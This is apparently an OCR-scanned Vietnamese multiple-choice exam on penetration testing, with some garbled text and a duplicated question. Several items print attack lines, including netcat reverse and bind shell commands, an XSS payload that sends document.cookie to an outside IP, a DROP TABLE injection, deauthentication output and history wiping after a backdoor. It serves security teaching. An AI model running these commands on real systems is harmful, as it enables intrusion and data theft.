Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 12

Câu 1.

Sau một số nỗ lực khai thác lỗi từ một trang web mục tiêu đã tạo ra thông báo lỗi như
sau:
Server Error in '/' Application.
Unclosed quotation mark after the character string ". Incorrect syntax near ".
Description: An unhandled exception occurred during the execution of the current web request.
Please review the stack
Exception Details: System Data SqlClient SqlException: Unclosed quotation mark after the
character string" Incorrect syntax near
Source Error:
Line 67:
SqlCommand cmd new SqlCommand(sql, connection); cmd.CommandType
CommandType.Text;
Line 68:
Line 69:
using (var reader cad.ExecuteReader())
Line 70:
while (reader.Read())
Line 71:
Điều nào dưới đây mô tả đúng nhất về thông báo lỗi trả về?
(A) Trang web có thể tồn tại lỗ hổng XSS
(B) Trang web có thể tồn tại lỗ hổng SQL injection
(C) Trang web có thể tồn tại lỗ hổng CSRF
Do tin nhiem dap an
(D) Trang web có thể tồn tại lỗ hổng tràn bộ đệm

Câu 2. Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số
chương trình hợp lệ trên hệ thống Windows như calc.exe, mspaint.exe dễ kiểm tra khả năng
bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này?
(A) Meterpreter
(B) Powershell
(C) Shellter
(D) Metasploit

Câu 3. Thuật ngữ nào được sử dụng để mô tả các cuộc tấn công sử dụng kết nối Bluetooth của
thiết bị đề lấy cắp thông tin?
(A) NFC cloning
(B) Bluesnarfing
(C) BlueBorne
(D) Wardriving
Câu 4. Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ &
ứng dụng web như Platform, CMS Platform, Webserver platform, Server headers, Cookie, Type
of Script...?
(A) whatweb
(B) OpenVas
(C) wpscan
(D) w3af
Câu 5. Sau khi xâm nhập một máy chủ từ xa có địa chỉ 102.15.8.13, Cameron thực hiện câu
lệnh sau trên máy chủ từ xa: H31
nc-lvp 4444 -e /bin/bash
Trong trường hợp Cameron muốn tạo bind shell, lệnh nào sau đây cần được thực hiện trên
máy tính của anh ấy?
(A)nc 102.15.8.13 4444
(B) nc -e /bin/bash -lvp 4444
(C) nc -lvp 4444 102.15.8.13
(D) nc 102.15.8.13 -e/bin/bash
Câu 6. Kè tấn công lừa người dùng truy cập vào một trang web độc hại thông qua e-mail lừa
đảo. Người dùng nhấp vào liên kết e-mail và truy cập trang web độc hại trong khi vẫn duy trì
phiên hoạt động được xác thực với ngân hàng của mình. Kẻ tấn công thông qua trang web độc
hại đã chỉ thị cho trình duyệt của người dùng gửi yêu cầu đến trang web ngân hàng mà người
dùng không hè hay biết. Đây là dạng tấn công nào?
(A) CSRF
(B) Hidden form field
(C) XSS
(D) CSPP (Connection String Parameter Pollution)
Câu 7. Steve dang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu
thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu.
Steve đang sử dụng phương pháp thu thập thông tin nào?
(A) Enumeration
(B) Active
(C) OSINT
(D) Port scanning

Câu 8. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.
root@xali:~# aircrack-ng-b 12:34:56:78:90:AB /tmp/wpa_output*.cap
Mục đích của Tom trong trường hợp này là gì?
(A) Xác định các mạng hỗ trợ WPS
(B) Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối
(C) Bẻ khóa WEP dựa trên gói tin thu được
(D) Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khóa WPS PIN

Câu 9. Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ
Windows. Jenny có gắng duy trì khả năng kết nói lâu dài tới hệ thống máy tính nạn nhân. Câu
lệnh nào dưới đây có khả năng thực hiện việc đó?
(A) net session server | dsquery-user | net use c$
(B) powershell && set-executionpolicy unrestricted
(C) schtasks.exe/create'tr powershell.exe Sv.ps1/run
(D) reg save HKLMSystemCurrentControlSetServicesSv.reg

Câu 10. Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng
Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử
dụng tấn công mặt nạ?
(A)
hashcat -m 5600 r rules/bestG4.rule hash.txt wordlist.txt
(B)
hashcat -m 5600 hash.txt
(C)
hashcat-m 5600 -o results.text hash.txt wordlist.txt
(D) hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a
Câu 11….. là cơ sở dữ liệu nào được tạo ra và duy trì bởi MITRE, trong đó nêu chi tiết các kỹ
thuật, hành vi kẻ tấn công có thể thực hiện đề tấn công các cơ quan, tổ chức.
(A) CWE
(B) CAPEC
(C) ATT&CK
(D) CVE

Câu 14. Lệnh nào sau đây cho phép tìm kiếm các web server chạy IIS tại Việt Nam có mở port
22 khi sử dụng Shodan?
(A)
IIS netport:22 country:vn
(B) IIS port:22 geo:vn
(C)
IIS os:22 server:vn
(D)
IIS port:22 country:vn

Câu 15. Trong quá trình kiểm thử ứng dụng web, Sam đang tạo 1 payload có nội dung như sau:
<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.c ookie;
</script>
Sam đang muốn thực hiện kiểm thử lỗ hồng nào?
(A) XSS
(B) SQL injection
(C) Session hijacking
(D) Path traversal
Câu 16. Trong quá trình kiểm thử mạng không dây, Tom có thu được 1 số lượng lớn các gói tin
handshake. Lệnh nào dưới đây cho phép bẻ khóa PSK dựa trên gói tin handshake thu được sử
dụng tập từ điển cho trước?
(A)
airodump-ng-c 1-bssid E4:6F:13:04:CE:31 -w rockyou.txt
(B)
airmon-ng-w rockyou.txt -b <target MAC> <outfile>
(C) hashcat -m 2500 WPA.hccapx rockyou.txt
(D)
aircrack-ng -w rockyou.txt -b <target MAC> <outfile>

Câu 17. Trong quá trình dò quét nmap, Casey sử dụng cờ -O để xác định thông tin về hệ điều
hành của hệ thống. Quá trình dò quét xác định được thông tin về hệ thống như sau:
Running: Linux 2.6.X
OS CPE: cpe: /o: linux:linux kernel: 2.6
OS details: Linux 2.6.9 - 2.6.33
Casey có thể xác định điều gì từ những thông tin này?
(A) Ngày hệ thống được và lần cuối.
(B) Thông tin về các bản và của Linux kernel đã được cài đặt.
(C) • Hệ thống đang chạy Linux 2.6 kernel trong khoảng giữa 9 và 33
(D)
Xác định thông tin về bản phân phối Linux (Linux distribution) được cài đặt trên hệ thống.
Câu 18. Trong quá trình kiểm thử xâm nhập, Mary thu thập được một số thông tin xác thực cấp
thấp cho máy chủ Linux thông qua tấn công kỹ nghệ xã hội. Sau khi kiểm tra và xác minh các
thông tin đăng nhập này, Mary bắt đầu tìm kiếm cách thức thực hiện tấn công leo thang đặc
quyền và có phát hiện ra thông tin sau:
foo@victim:-$ sudo l
User foo may run the following commands on this host:
(root)
NOPASSWD: ALL
foo@victim:-$
Lỗ hồng cấu hình nào được Mary tìm thấy?
(A) Sử dụng SUID/SGID không an toàn
(B) Lạm dụng Sticky bit
(C) Mật khẩu được lưu trữ dưới dạng bản rõ
(D) Quyên truy cập sudo không an toàn

Câu 19. Liam thực hiện kiểm thử cho hệ thống công ty X. Sau khi thực hiện xâm nhập thành
công vào hệ thống, cô ấy thực hiện câu lệnh dưới đây trên máy mục tiêu:
nc 10.1.10.1 6666 -e /bin/sh
Liam đang cố gắng thực hiện việc gì?
(A) Khởi động reverse shell sử dụng Netcat
(B) Không có đáp án nào đúng
(C) Chặn bắt lưu lượng trên cổng 6666 sử dụng Netcat
(D) Thiết lập bind shell sử dụng Netcat

Câu 20. Loại nào sau đây không phải là khung chính được xác định bởi chuẩn IEEE 802.11?
(A) Control frame
(B) Management frame
(C) Beacon frame
(D) Data frame

Câu 21. Phương pháp bẻ khóa mật khẩu nào sau đây mất nhiều thời gian và công sức nhất,
trong đó kẻ tấn công có gắng mọi kết hợp có thể có của chữ hoa, chữ thường, chứ cái, số và
ký tự đặc biệt?
(A) Rule based-attack
(B) Brute force attack
(C) Dictionary attack
(D) Hybrid attack

Câu 22. Tom thực hiện quá trình quét cổng một hệ thống và kết quả quét cho thấy 6 công TCP
đang mở là: 22, 80, 443, 515, 631 và 9100. Thiết bị nào sau đây có khả năng nhất?
(A) FTP server
(B) SSH server
(C) Webserver
(D) Printer
Câu 22. Tom thực hiện quá trình quét cổng một hệ thống và kết quả quét cho thấy 6 cổng TCP
đang mở là: 22, 80, 443, 515, 631 và 9100. Thiết bị nào sau đây có khả năng nhất?
(A) FTP server
(B) SSH server
(C) Webserver
(D) Printer
Câu 23. Sau khi thực hiện xâm nhập vào hệ thống mục tiêu bằng một tài khoản không có đặc
quyền, Steve phát hiện ra rằng trên hệ thống mục tiêu có cài đặt nmap. Steve quyết định sử
dụng nmap để dò quét các máy chủ khác trong mạng nội bộ. Tùy chọn nào cần được sử dụng
để dò quét thành công các máy chủ khác khi sử dụng nmap bằng tài khoản không có đặc
quyền mà Steve chiến được?
(A)-oA
(B)-sT
(C)-sV
(D)-u

Câu 24. Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ (phía sau các giải
pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có
nghĩa là gì?
(A) Người kiểm thử được cung cấp tài khoản quản trị
(B) Người kiểm thử sẽ chỉ được kết nối tới hệ thống địch trong một khoảng thời gian giới hạn
(C) Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ
được xác định trước.
(D) Người kiểm thử chỉ được cung cấp kết nổi ban đầu tới các hệ thống đích

Câu 25. Trong quá trình kiểm thử, Jack muốn thực hiện dò quét mục tiêu bằng nmap tuy nhiên
anh ấy chỉ có quyền ở mức người dùng thông thường. Khi đó, anh ấy nên sử dụng kỹ thuật dò
quét nào?
(A) XMAS scanning
(B) NULL scanning
(C) SYN scanning
(D) TCP Connect scanning

Câu 26. Khi sử dụng nmap để dò quét cồng, tùy chọn nào được sử dụng để quét một công cụ
thể?
(A) --p
(B)-P
(C) -Pn
(D) –ports

Câu 27. Charleen được giao nhiệm vụ tiếp tục quá trình khai thác lỗ hồng trên hệ thống máy
chủ Windows 2012. Các thông tin được chuyển giao bao gồm cả thông tin đăng nhập cấp
người dùng trong hệ thống. Mục tiêu của cô ấy là có được quyền quản trị vào hệ thống máy
chủ. Charleen đã thu được NTLM hash và muốn thực hiện tấn công pass-the-hash. Công cụ
nào có thể được sử dụng trong trường hợp này?
(A)
Hashcat
(B) CeWL
(C) Hydra
(D) Smbclient

Câu 28. Trong các đáp án dưới đây thì đâu là 1 kiểu tấn công từ chối dịch vụ trong mạng không
dây?
(A) Packet injection
(B) Evil twin
(C) Jamming attack
(D) Karma attack

Câu 29. Sau khi xâm nhập được vào hệ thống mục tiêu, Jenny cố gắng thực hiện một số câu
lệnh sau:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy.
C:\>accesschk.exe -w-s-q-u Users C:\Windows rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\T C:\Windows\Tracing\jtr.exe jtr version 3.2...
jtr>
Dựa vào các câu lệnh trên, Jenny đang cố gắng khai thác lỗ hồng nào trên hệ thống mục tiêu?
(A) Writeable service
(B) Application whitelisting
(C) Shell escape
(D) Insecure file permissions

Câu 30. Kỹ thuật kiếm thứ nào được thực hiện mà trong đó người kiểm thử không biết bất cứ
thông tin nào về hệ thống mục tiêu và mục tiêu cũng không được thông báo trước khi tiến hành
kiểm thử?
(A) Unannounced testing
(B) Blind testing
(C) Double blind testing
(D) Announced testing

Câu 33. Khi thực hiện kiểm thử xâm nhập, Charles sử dụng nmap đề dò quét hệ thống mục tiêu
bằng lệnh sau:
nmap -sTsV-T2 -p 1-65535 example.com
Sau khi xem quá trình dò quét chạy trong hơn hai giờ đồng hồ, anh ấy nhận ra rằng mình cần
phải tối ưu hóa câu lệnh dò quét. Phương án nào dưới đây KHÔNG phải là cách hữu ích để
tăng tốc độ dò quét?
(A) Chì quét UDP để cải thiện tốc độ
(B) Thay đổi mẫu thời gian từ - T2 sang thành -T3 hoặc-T4.
(C) Sử dụng danh sách cổng mặc định.
(D)Chuyển sang sử dụng SYN scan.

Câu 34. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.
root@xali:/tmp# airodump-ng-c 4-bssid 12:34:56:78:90:AB -w airodump_output wlanemon
Mục đích của Tom trong trường hợp này là gì?
(A) Bẻ khóa PSK được sử dụng để kết nối với điểm truy cập không dây
(B) Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP
(C) Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID
12:34:56:78:AB
(D) Tiến hành tấn công brute force PIN WPS để có được quyền truy cập mật khẩu của AP

Cau 35. Renee dang tiến hành một cuộc kiểm thử xâm nhập và phát hiện ra bằng chứng cho
thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay
sau khi xác nhận các nghi ngờ của mình?
(A) Không cần thực hiện thêm hành động nào vi phạm vi công việc của Renee chỉ giới hạn
trong việc thực hiện kiểm thử
(B) Báo cáo ngay các mông tin về bằng chứng tân công cho khách hàng
(C) Ghi lại các chi tiết trong báo cáo kiếm thử xâm nhập
(D) Khắc phục lỗ hổng cho phép Renee có quyền truy cập

Câu 36. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.
Terminal-root@kali:-
File Edit View Terminal Tabs
Help
root@kali:~# aireplay-ng-00a 12:34:56:78:90:ABC FE:DC:BA:09:87:65 wlane 02:42:30 Waiting
for beacon frame (BSSID: A0:40:A0:8D:8C:6E) on channel 4
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0] 0
02:42:31 Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0] 1
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [8] 2
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [01 3 7). STMAC:
[FE:DC:BA:09:87:65] [01 4
02:42:31 Sending 64 directed DeAuth (code
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [015
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0] 6 Sending 64 directed
DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [01 7
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0] 8
02:42:31
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [01 9 Sending 64 directed
DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/10
02:42:31
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/11 Sending 64 directed
DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/12
02:42:31
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/13 DeAuth (code 7).
STMAC: [FE:DC:BA:09:87:65] [0/14
02:42:31 Sending 64 directed 02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/15
02:42:31
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/16 64 directed DeAuth
(code 7). STMAC: [FE:DC:BA:09:87:65] [0/17
02:42:31 Sending
Sending 64 directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/18 02:42:31 Sending 64
directed DeAuth (code 7). STMAC: [FE:DC:BA:09:87:65] [0/19-
02:42:31
Mục đích của Tom trong trường hợp này là gì?
(A)
Khôi phục mật khẩu WPA từ WPS PIN

(B) Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị
đang kết nối trong mạng không dây
(C) Thiết lập proxy để thực hiện tấn công SSL strip lên các yêu cầu HTTPS
(D) Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

Câu 37. Loại văn bàn nào sau đây có giá trị pháp lý thường được sử dụng để tham chiếu cho
việc bảo vệ tinh bí mật của dữ liệu và các thông tin khác mà người kiểm thử có thể gặp phải?
(A) NDA
(B) SOW
(C) MSA
(D) NIST

Câu 38. Sau khi xâm nhập thành công vào hệ thống mục tiêu và tiến hành cài đặt backdoor,
lệnh nào sau đây cho phép người kiểm thử xóa toàn bộ nội dung của phiên làm việc với
terminal trên Linux?
(A) rm -f./history
(B) history -remove
(C) cat history I clear
(D) history –c

Câu 39. Trong quá trình kiểm thử ứng dụng web, Jack phát hiện ra một số lỗ hồng nghiêm
trọng. Anh ấy muốn lợi dụng các lỗ hồng này để tạo một tài khoản trái phép. Những tấn công
nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của
Jack?
(A) CSRF, Insecure direct object reference
(B) Code injection, Directory traversal
(C) Insecure direct object reference, Code injection
(D) CSRF, Code injection

Cau 40. Norm dang thực hiện kiểm thử xâm nhập một ứng dụng web và muốn điều khiển các
tham số đầu vào được gửi đến ứng dụng trước khi nó rời khỏi trình duyệt web. Công cụ nào
sau đày có thể giúp Norm thực hiện việc này?
(A) GDB
(B) YASCA
(C) Burpsuite
(D) AFL

Câu 41. Kỹ thuật tấn công web nào dưới đây KHÔNG cho phép kẻ tấn công thực hiện đánh cắp
phiên làm việc của người dùng hợp lệ?
(A) CSRF
(B) SQL injection
(C) XSS
(D) Session hijacking

Câu 42. Trong giai đoạn xác định phạm vi của kiểm thử xâm nhập, Lauren được cung cấp dài
IP của hệ thống mà cô ấy sẽ kiểm tra cũng như thông tin về những gì hệ thống chạy nhưng
không nhận được một sơ đồ mạng đầy đủ. Kỹ thuật kiểm thử nào được sử dụng trong trường
hợp này?
(A) Crystal box
(B) Gray box
(C) White box
(D) Black box
Câu 43. Lệnh airmon-ng start wlano được sử dụng để thiết lập wireless adapter về chế độ
(A) Crack
(B) Management
(C) Injection
(D) Monitor

Câu 44. Tập------ cho phép trình thu thập dữ liệu của công cụ tìm kiếm biết có thể truy cập vào
những URL nào trên trang web. Trong đó có thể chứa các thông tin nhạy cảm mà người thực
hiện kiểm thử cản quan tâm.
(A) robots txt
(B) secret.txt
(C) index.txt
(D) sitemap.txt

Cau 45. -------là hình thức tấn công bằng mật khẩu được xây dựng dựa trên cuộc tấn công từ
điền nhưng thêm các thành phần phó biển hơn như 1 hoặc 1 ở cuối mỗi tư. Phương pháp này
được sử dụng để tìm những điều bất thường trong mật khẩu.
(A) Hybrid attack
(B) Rule based-attack
(C) Non-electronic attack
(D) Brute force attack

Câu 46. Các công cụ HULK, LOIC, HOIC và SlowLoris có khả năng tạo ra tấn công nào dưới
đây?
(A) Crack password
(B) SMB hash capture
(C) Dos/DDoS
(D) Brute-force SSH

47
all possible dirs.)
+ File/dir/ in robots.txt returned a non-forbidden or redirect HTTP code (302) + "robots.txt"
contains 1 entry which should be manually viewed,
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22) Apache 1.3.42 (final
release) and 2.0.64 are also current.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /dvwa/config/: Directory indexing found. +/dvwa/config/: Configuration
information may be available
remotely. + OSVDB-12184: /dvwa index.php?-PHP88B5F22A0-3C92-1143-
A3A9-4C7B0BC10000: PHP reveals potentially sensitive information via certain HTTP requests
that contain specific QUERY strings.
+ OSVDB-3268: Directory indexing found. OSVDB-3092: /dvwa/login/: This might be
interesting...
OSVDB-3268: /dvwa/docs/: Directory indexing found.
OSVDB-3092: /dvwa/CHANGELOG.txt: A changelog was found.
/dvwa/login.php: Admin login page/section found.
+ OSVDB-: /dvwa/?-s: PHP allows retrieval of the source code via -s parameter, and may allow
command execution. See http://www.kb.cert.org/vuls/id/520827
+ OSVDB-: /dvwa/login.php?-s: PHP allows retrieval of the source code vias parameter, and
may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 6545 items checked: 10 error(s) and 14 item(s) reported on remote host
+ End Time:
seconds)
+1 host (s) tested
2012-12-03
01:33:07
(GMTO)
(224
(A) SQL injection
(B) CSRF
(C) SSL downgrade attack
(D) Sesion hijacking

Câu 48. Khi thực hiện tìm kiếm thông tin sử dụng Google, lệnh nào dưới đây cho phép tìm kiếm
các website có cấu trúc thư mục là /admin có phần mở rộng là .edu.vn
(A) site:edu.vn inurl:/admin
(B) info:/admin filetype:edu.vn
(C) Index of /admin site:edu.vn
(D) index of /admin link:edu.vn

Câu 49. Trong quá trình kiểm thử hệ thống máy chủ mục tiêu, Harry phát hiện ra một lỗ hồng và
quyết định sử dụng metasploit để thử khai thác lỗ hồng này. Giả sử các mục được điền trước là
hợp lệ đối với máy chủ mục tiêu, Harry sẽ cần xác định tùy chọn nào trước khi có thể chạy mô-
đun này?
exploit(windows/http/manageengine_connectionid_write) > options
Module options (exploit/windows/http/manageengine_connectionid_write):
Name
Current Setting Required Description
no
yes
yes
no
Proxies
A proxy chain of format type:host:porti,
type:host:port][...]
The target address
RHOST
8020
false
The target port (TCP)
RPORT
SSL
Negotiate SSL/TLS for outgoing connectio
ins TARGETURI / entral
yes
по
The base path for ManageEngine Desktop C
VHOST
HTTP server virtual host
(A) VHOST
(B) SSL
(C) Proxies
(D) RHOST

Câu 50. Công cụ phổ biến nào được sử dụng để khám phá bị động mạng không dây và cung
cấp nhiều tính năng tương tự như airodump-ng?
(A) Aircrack-ng
(B) NetStumbler
(C) Kismet
(D) Netsniff

Câu 51. Mike dang tiến hành kiểm thử xâm nhập cho một ứng dụng web và phát hiện ra quá
trình đăng nhập của người dùng đang sử dụng phương thức HTTP GET để gửi dữ liệu. Để
giảm thiểu rủi ro lộ thông tin nhạy cảm, giải pháp nào sau đây có thể được sử dụng?
(A) Sử dụng HTTP TRACE
(B) Sử dụng HTTP POST
(C) Sử dụng HTTP OPTIONS
(D) Sử dụng HTTP PUT

Câu 52. Khi thực hiện kiểm thử, Peter phát hiện ra có khả năng thực hiện tấn công SQL
injection. Khi sử dụng chuỗi lệnh tiêm sau: H51
SELECT * FROM Orders Pend WHERE Location_City = 'NY'
anh ấy có thể xem tất cả các đơn đặt hàng đang chờ xử lý từ NY. Nếu Peter muốn xóa hoàn
toàn bàng Order_Pend thì câu lệnh SQL nào nên được sử dụng?
(A)
WHERE Location_City = NY'1=1': DROP TABLE
(B) O
DROP TABLE Orders Pend WHERE NY = 1' 1
(C) SELECT FROM Order's Pend WHERE Location City = NY'DROP TABLE Orders Pend
(D) SELECT * FROM Orders_Pend WHERE NY'; DROP TABLE 1

Câu 53.
là quá trình thu thập thông tin khi tiến hành thực hiện kiểm thử xâm nhập, trong đó có thể áp
dụng các kỹ thuật thu thập chủ động hoặc bị động.
(A) Footscanning
(B) Footpainting
(C) Footgathering
(D) Footprinting

Cau 54. Tom dang thực hiện kiểm thử ứng dụng web cho một ngân hàng sử dụng Nikto. Hiện
tại, anh ấy muốn thu thập tất cả các yêu cầu (request) được tạo ra bởi Nikto sử dụng Burp
Suite Proxy trên công 8080. Lệnh nào dưới đây cho phép anh ấy thực hiện việc này?
(A) ./nikto.pl -host http://vulnweb.app/-proxy http://localhost:8080/
(B) ./nikto.pl -host http://vulnweb.app/-useproxy http://localhost:8080/
(C) ./nikto.pl -host http://vulnweb.app/-proxy http://localhost:8080/
(D) ./nikto.pl -url http://vulnweb.app/-proxy http://localhost:8080/
Câu 55. Trong quá trình thu thập và tìm kiếm thông tin của một kiểm thử xâm nhập vào hệ
thống khách hàng, Angela đã khôi phục một bức ảnh và muốn kiểm tra, phân tích nó để tìm
kiếm các thông tin hữu ích chứa trong metadata. Công cụ nào dưới đây là thích hợp NHẤT để
thực hiện việc này?
(A) Nginx
(B) ExifTool
(C) PsTools
(D) Grep

Câu 56. Kiểu tấn công bẻ khóa mật khẩu nào dưới đây chỉ có thể được thực hiện theo hình
thức “Tấn công chủ động"?
(A) Dictionary attack
(B) Hash injection attack
(C) Brute force attack
(D) MITM

Câu 57. Wendy dang thực hiện một cuộc tấn công chiếm quyền điều khiển phiên. Wendy cần
có được thông tin nào để có thể đảm bảo rằng cuộc tấn công của cô ấy sẽ thành công?
(A) Service ticket
(B) Session cookie
(C) Session ticket
(D) Username
Câu 58. Trong quá trình dò quét công, dựa vào thông tin dưới đây ta có thể kết luận điều gì về
kỹ thuật scan được sử dụng và trạng thái công được dò quét?
192.5.5.92:4031-----NO FLAGS SET------- 192.5.5.110:23
192.5.5.92:4031 ---- NO RESPONSE---- 192.5.5.110:23
(A) XMAS scan được sử dụng, cổng đông
(B) NULL scan được sử dụng, cổng đòng
(C) NULL scan được sử dụng, công mở
(D) IDLE scan được sử dụng, cổng mở

Câu 59. Công cụ nào dưới đây KHÔNG có khả năng dò quét lỗ hồng ứng dụng web?
(A) WebInspect
(B) Wfuzz
(C) Recon-ng
(D) Acunetix
Câu 60. Thông tin nào KHÔNG thể thu thập được thông qua kỹ thuật footprinting?
(A) Thông tin địa chỉ email
(B) Số điện thoại
(C) Thông tin địa chỉ IP
(D) Sơ đồ kiến trúc mạng nội bộ

You might also like